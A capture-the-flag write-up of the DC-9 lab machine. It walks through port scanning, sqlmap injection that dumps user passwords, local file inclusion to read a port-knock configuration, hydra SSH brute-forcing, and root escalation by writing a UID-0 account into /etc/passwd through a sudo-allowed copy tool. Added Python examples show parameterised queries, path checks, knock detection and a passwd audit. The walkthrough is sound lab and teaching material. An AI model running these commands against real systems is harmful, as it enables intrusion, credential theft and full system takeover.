1. Host discovery
Run netdiscover.
The target host is found at 192.168.203.135.
2. Port scanning
Scan with Nmap:
root@kali:~# nmap -sV -A 192.168.203.135 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-17 15:16 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.135
Host is up (0.00046s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.203.135
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.203.135:80/manage.php
| Form id:
| Form action: manage.php
|
| Path: http://192.168.203.135:80/search.php
| Form id:
|_ Form action: results.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_ /includes/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_http-server-header: Apache/2.4.38 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:apache:http_server:2.4.38:
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082
| CVE-2019-10097 6.0 https://vulners.com/cve/CVE-2019-10097
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2019-0215 6.0 https://vulners.com/cve/CVE-2019-0215
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2019-10081 5.0 https://vulners.com/cve/CVE-2019-10081
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196
| CVE-2019-0197 4.9 https://vulners.com/cve/CVE-2019-0197
|_ CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
MAC Address: 00:0C:29:23:B6:C5 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.46 ms 192.168.203.135
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.38 seconds
The target has port 80 open, and port 22 shows as filtered. Let's look at the web service:
3. Vulnerability discovery
Try the search box for SQL injection.
It is clear that an injection exists. (The site appears to apply some filtering to injected input and also suppresses error messages.)
Use sqlmap to exploit the injection:
sqlmap -u "http://192.168.203.135/results.php" --data="search=123" --dbs
sqlmap -u "http://192.168.203.135/results.php" --data="search=123" -D Staff --tables
sqlmap -u "http://192.168.203.135/results.php" --data="search=123" -D Staff -T StaffDetails --columns
This looks like nothing more than employee details; check the other table:
sqlmap -u "http://192.168.203.135/results.php" --data="search=123" -D Staff -T Users --columns
sqlmap -u "http://192.168.203.135/results.php" --data="search=123" -D Staff -T Users -C UserID,Username,Password --dump
This gives the admin password: transorbital1.
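How the injection found above works, and what the fix looks like, as an added Python example (not code from this write-up or from the DC-9 box): the same staff search implemented once by splicing the user's term into the SQL text and once with a bound parameter, run against an in-memory SQLite table holding constructed rows. The write-up notes that the site filters some input and hides database errors; that is a blacklist, and a blacklist does not change the fact that the term is parsed as SQL. Parameter binding is the structural fix, because the value never reaches the SQL parser at all.

```python
import sqlite3

# Constructed sample rows modelled on the write-up's Staff.StaffDetails table;
# they are NOT the DC-9 box's real data.
SAMPLE_ROWS = [
    ("Mary", "Moe", "Sales"),
    ("Julie", "Dooley", "Engineering"),
    ("Fred", "Flintstone", "Facilities"),
]


def make_db():
    """Build an in-memory SQLite database standing in for the site's MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE StaffDetails (firstname TEXT, lastname TEXT, department TEXT)"
    )
    conn.executemany("INSERT INTO StaffDetails VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def search_vulnerable(conn, term):
    """The pattern behind results.php-style bugs: user input spliced into SQL text.
    A quote in the term closes the literal and the rest is parsed as SQL grammar."""
    sql = "SELECT firstname, lastname FROM StaffDetails WHERE lastname = '%s'" % term
    return conn.execute(sql).fetchall()


def search_hardened(conn, term):
    """Same query with a bound parameter: the driver ships the value separately from
    the statement text, so no character in the term can alter the statement."""
    sql = "SELECT firstname, lastname FROM StaffDetails WHERE lastname = ?"
    return conn.execute(sql, (term,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"  # textbook tautology probe
    print("vulnerable:", search_vulnerable(db, probe))  # every row comes back
    print("hardened:  ", search_hardened(db, probe))    # no row has that literal last name
```

Run it and compare the two outputs: the concatenated version returns all three rows for the probe, the parameterised version returns none, because it is looking for an employee whose last name literally is `' OR '1'='1`.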
4. Getting a shell
We use the admin credentials to log in to the website.
There is an interesting detail here: the message "File does not exist".
That looks like a local file inclusion:
Sure enough, there is a local file inclusion.
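What a fixed version of the include would look like, as an added Python example (not the site's PHP and not code from this write-up): two ways to turn a user-supplied page name into a file path without letting it escape the page directory. The directory `/var/www/html/pages` and the page names in `ALLOWED_PAGES` are assumptions for the example. The allow-list is the preferred form; the containment check is the fallback when free-form names cannot be avoided, and it rejects both `../` traversal and absolute paths. A generic "page not found" response, rather than the verbose "File does not exist" seen on the box, also stops the application from confirming which probes reached the filesystem.

```python
import os

# Assumed location of the pages the application includes (hypothetical path,
# not taken from the DC-9 box).
PAGES_DIR = "/var/www/html/pages"

# Allow-list of page names the application actually offers (assumed for the example).
ALLOWED_PAGES = {"home", "search", "manage"}


def resolve_by_allowlist(name, base_dir=PAGES_DIR):
    """Strictest option: only known page names map to files; anything else is rejected
    before a path is even built, so traversal sequences are never interpreted."""
    if name not in ALLOWED_PAGES:
        return None
    return os.path.join(base_dir, name + ".php")


def resolve_by_containment(requested, base_dir=PAGES_DIR):
    """Fallback for free-form names: canonicalise the joined path, then require the
    result to still sit inside base_dir. os.path.join discards base_dir when
    `requested` is absolute, and realpath collapses `..`, so both escape routes end
    up outside base_dir and are refused."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for req in ("home.php", "../../../../etc/knockd.conf", "/etc/passwd"):
        print(f"{req!r:35} -> {resolve_by_containment(req)}")
```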
My original plan was still to write a one-line webshell into the Apache log file and use it to get a shell, but the box's author seems to have moved the log file elsewhere.
So I borrowed the approach from another write-up: https://blog.csdn.net/adminuil/article/details/104055711
Include /etc/knockd.conf:
knockd is a port-knocking server. It listens to all traffic on an Ethernet (or other available) interface, waiting for a special sequence of port hits. Client software such as telnet or PuTTY triggers a port hit by sending a TCP or UDP packet to a port on the server.
We can see the target has indeed been rigged, which is also why our scan showed port 22 as filtered.
Now we need to hit ports 7469, 8475 and 9842 in that order, and the SSH port will open.
Now we can see that port 22 is open.
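How knockd's matching works, as an added Python model (not knockd's own code and not code from this write-up): each source address has a position in the sequence; a SYN to the next expected port advances it, a SYN to any other port discards the attempt, and the whole sequence must complete within a timeout (5 seconds here is an assumed value, standing in for knockd's `seq_timeout` option). The sequence itself is the one the write-up read from `/etc/knockd.conf`. The model shows why an ordinary port scan never opens the door (ports are probed in numeric order, which is not the sequence) and, equally, why the configuration file is the entire secret: once it is readable through the file inclusion, the "filtered" port 22 is effectively open. Port knocking hides SSH; it does not replace key-only authentication and the other SSH hardening on the box.

```python
# Port-knock sequence the write-up recovered from /etc/knockd.conf on DC-9.
KNOCK_SEQUENCE = (7469, 8475, 9842)
# Seconds allowed to complete the whole sequence (assumed value for the example,
# mirroring the role of knockd's seq_timeout option).
SEQ_TIMEOUT = 5.0


class KnockTracker:
    """Minimal model of knockd's per-source sequence matching (illustrative only)."""

    def __init__(self, sequence=KNOCK_SEQUENCE, timeout=SEQ_TIMEOUT):
        self.sequence = tuple(sequence)
        self.timeout = timeout
        # src_ip -> (index of the next expected port, time of the first hit)
        self.progress = {}

    def observe(self, ts, src, dport):
        """Feed one inbound SYN; return True when src has just completed the sequence."""
        idx, started = self.progress.get(src, (0, None))
        if started is not None and ts - started > self.timeout:
            idx, started = 0, None          # too slow: the attempt starts over
        if dport != self.sequence[idx]:
            self.progress.pop(src, None)    # wrong port: the attempt is discarded
            return False
        if idx == 0:
            started = ts                    # first correct hit starts the clock
        idx += 1
        if idx == len(self.sequence):
            self.progress.pop(src, None)
            return True                     # the door opens for src
        self.progress[src] = (idx, started)
        return False


def detect_knocks(events, sequence=KNOCK_SEQUENCE, timeout=SEQ_TIMEOUT):
    """Run the matcher over (timestamp, src_ip, dst_port) SYN events and return
    (timestamp, src_ip) for every completed sequence."""
    tracker = KnockTracker(sequence, timeout)
    return [(ts, src) for ts, src, dport in events if tracker.observe(ts, src, dport)]


# Constructed SYN events (seconds, source address, destination port), not captured traffic.
SAMPLE_EVENTS = [
    (100.0, "192.168.203.1", 7469),
    (100.4, "192.168.203.1", 8475),
    (100.9, "192.168.203.1", 9842),   # in order, within 5 s -> opens
    (200.0, "192.168.203.50", 8475),
    (200.3, "192.168.203.50", 7469),
    (200.6, "192.168.203.50", 9842),  # wrong order -> never completes
    (300.0, "192.168.203.77", 7469),
    (307.0, "192.168.203.77", 8475),  # 7 s after the first hit -> timed out
    (307.5, "192.168.203.77", 9842),
]

if __name__ == "__main__":
    print(detect_knocks(SAMPLE_EVENTS))  # only the first source completes
```

Fed with real data, the same matcher run over firewall SYN logs doubles as a detector: a completed sequence from an address that is not a known administrator is exactly the event a defender wants to alert on.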
So far we only have the admin account, but the /etc/passwd we just read through the file inclusion does not seem to contain an admin user, so admin is not the way in; it looks more like one of those other users. So I ran the injection against the database once more:
sqlmap -u "http://192.168.203.135/results.php" --data="search=123" -D users -T UserDetails --dump
Result:
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+
Next, use the obtained usernames and passwords for a brute-force attempt with hydra.
root@kali:~# hydra -L username.txt -P password.txt 192.168.203.135 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-17 17:18:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 306 login tries (l:17/p:18), ~20 tries per task
[DATA] attacking ssh://192.168.203.135:22/
[22][ssh] host: 192.168.203.135 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.203.135 login: janitor password: Ilovepeepee
[22][ssh] host: 192.168.203.135 login: joeyt password: Passw0rd
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-17 17:19:52
We obtained three username/password pairs. Logging in with each in turn and switching between the accounts, we finally found a hidden file in janitor's home directory.
It looks like other users' passwords, so we run another brute-force with these passwords.
[22][ssh] host: 192.168.203.135 login: fredf password: B4-Tru3-001
[22][ssh] host: 192.168.203.135 login: joeyt password: Passw0rd
5. Privilege escalation
Logging in as fredf, we find that /opt/devstuff/dist/test/test can be run with sudo without the root password.
test is an executable, so let's browse the directory and see whether we can find any other clues.
We found its source code; from the usage it can be summarised as: read the contents of the file given as the first argument and write them into the file given as the second argument.
So we can create a user entry with a password and write it into /etc/passwd. Generate a salted password hash:
perl -le 'print crypt("hackergu","salt")'
Create the user entry:
echo 'admin:saBGghOLaw5vg:0:0::/root:/bin/bash' >> /tmp/passwd
Write it into /etc/passwd:
fredf@dc-9:/opt/devstuff/dist/test$ echo 'admin:saBGghOLaw5vg:0:0::/root:/bin/bash' >> /tmp/passwd
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/passwd /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su admin
Password:
root@dc-9:/opt/devstuff/dist/test# cd /root
root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt
███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝
Congratulations - you have done well to get to this point.
Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.
I also want to send out a big thank you to the various members of @m0tl3ycr3w .
They are an inspirational bunch of fellows.
Sure, they might smell a bit, but...just kidding. :-)
Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.
So long, and thanks for all the fish.
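The escalation above ends by appending a second UID-0 account, with a DES-crypt hash stored directly in /etc/passwd, through a sudo rule that lets a generic copy program write to any destination. Both halves are auditable: the sudo rule should never grant NOPASSWD to a program whose destination path is caller-controlled, and the resulting passwd entry is a textbook persistence artifact. The following is an added Python audit (not code from this write-up or from DC-9) that flags the three properties of that entry: a UID-0 name other than root, a password hash (or empty field) in passwd instead of shadow, and a UID shared with another account. The sample excerpt is constructed; only the last line is the entry the write-up appended, and the fredf/janitor UIDs are made up.

```python
# Constructed /etc/passwd excerpt. The last line is the entry the write-up appended on
# DC-9; the fredf/janitor UIDs are invented for the example.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1003:1003::/home/fredf:/bin/bash
janitor:x:1016:1016::/home/janitor:/bin/bash
admin:saBGghOLaw5vg:0:0::/root:/bin/bash
"""


def audit_passwd(text):
    """Return a list of (username, finding) tuples for suspicious /etc/passwd entries."""
    findings = []
    seen_uids = {}  # uid -> first username seen with it
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            findings.append((f"line {lineno}", "malformed-entry"))
            continue
        name, pw_field, uid = fields[0], fields[1], int(fields[2])
        # A UID-0 entry other than root is a second superuser login.
        if uid == 0 and name != "root":
            findings.append((name, "uid0-not-root"))
        # With shadow passwords the field is "x" ("*" for locked accounts); a real hash
        # here is world-readable, and an empty field means no password at all.
        if pw_field not in ("x", "*"):
            findings.append((name, "hash-in-passwd" if pw_field else "empty-password"))
        # Two names sharing one UID are the same account as far as the kernel is concerned.
        if uid in seen_uids:
            findings.append((name, f"duplicate-uid-with-{seen_uids[uid]}"))
        else:
            seen_uids[uid] = name
    return findings


if __name__ == "__main__":
    for who, what in audit_passwd(SAMPLE_PASSWD):
        print(f"{who}: {what}")
```

On a live system, run it against the real file (`audit_passwd(open("/etc/passwd").read())`) from a host-integrity job; a clean Debian install produces no findings, so any output is worth a look.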